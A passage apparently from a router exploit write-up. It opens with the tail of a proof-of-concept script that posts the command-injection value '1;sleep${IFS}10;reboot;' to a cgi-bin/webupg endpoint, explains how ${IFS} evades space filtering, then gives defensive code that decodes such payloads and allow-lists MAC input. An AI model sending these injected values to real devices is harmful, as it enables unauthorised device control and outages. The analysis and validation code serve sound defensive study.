    print("got sessionid=deadbeef !\n waiting for the reverse shell ...")
    # access cgi-bin/webupg
    try:
        response = requests.post("http://192.168.1.1/cgi-bin/webupg",
                                 headers={"Cookie": Cookie, "Content-Type": Contentty, "Referer": Referer, "Content-Length": Contentlen},
                                 data={"name": name, "newmac": cmd},
                                 timeout=0.0000000001)   # fire and forget: the router sleeps, then reboots
    except requests.exceptions.Timeout:
        print("done router will restart in 20 sec")
print("Device restarted!")
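The injected value 1;sleep${IFS}10;reboot; is worth reading closely: ${IFS} expands to the shell's field separator, so the payload contains no literal space and gets past a filter that only strips spaces. The example below is added for this page, not the firmware's code or the exploit author's: one function renders a submitted value the way a POSIX shell would split it into commands, which is useful when triaging a captured request, and one function shows the allow-list a MAC field should have had, returning an argv list for a shell-free call. The separators handled are the ones such payloads use; $(...) and backtick substitutions are not modelled. The ifconfig command line is an assumed stand-in for whatever the firmware runs.

```python
"""Decode an ${IFS} command injection and allow-list a MAC field (added example, not firmware code)."""
import re

MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}$")
# Command separators a POSIX shell honours; "&&" and "||" are listed before "&" and "|".
_SEPARATORS = re.compile(r"\s*(?:;|&&|\|\||\||&|\n)\s*")
_IFS = re.compile(r"\$\{IFS\}|\$IFS")


def injected_commands(value):
    """Simple commands a `sh -c` style evaluation of value would run, in order.

    ${IFS} and $IFS are replaced by a space (the default field separator), then
    the string is split on command separators and empty fragments are dropped.
    """
    expanded = _IFS.sub(" ", value)
    return [c for c in _SEPARATORS.split(expanded) if c]


def mac_argv(value):
    """Validate a MAC address strictly and build an argv list for subprocess.run(..., shell=False).

    Raises ValueError for anything that is not six colon-separated hex octets,
    so no shell metacharacter, and no ${IFS} trick, can ever reach a shell.
    The ifconfig invocation is an assumption standing in for the firmware's real command.
    """
    if not MAC_RE.match(value):
        raise ValueError("invalid MAC address: %r" % value)
    return ["ifconfig", "eth0", "hw", "ether", value.lower()]


if __name__ == "__main__":
    poc = "1;sleep${IFS}10;reboot;"          # the exploit's newmac value
    print("shell would run:", injected_commands(poc))
    for candidate in ("00:11:22:33:44:55", poc):
        try:
            print("accepted:", mac_argv(candidate))
        except ValueError as exc:
            print("rejected:", exc)
```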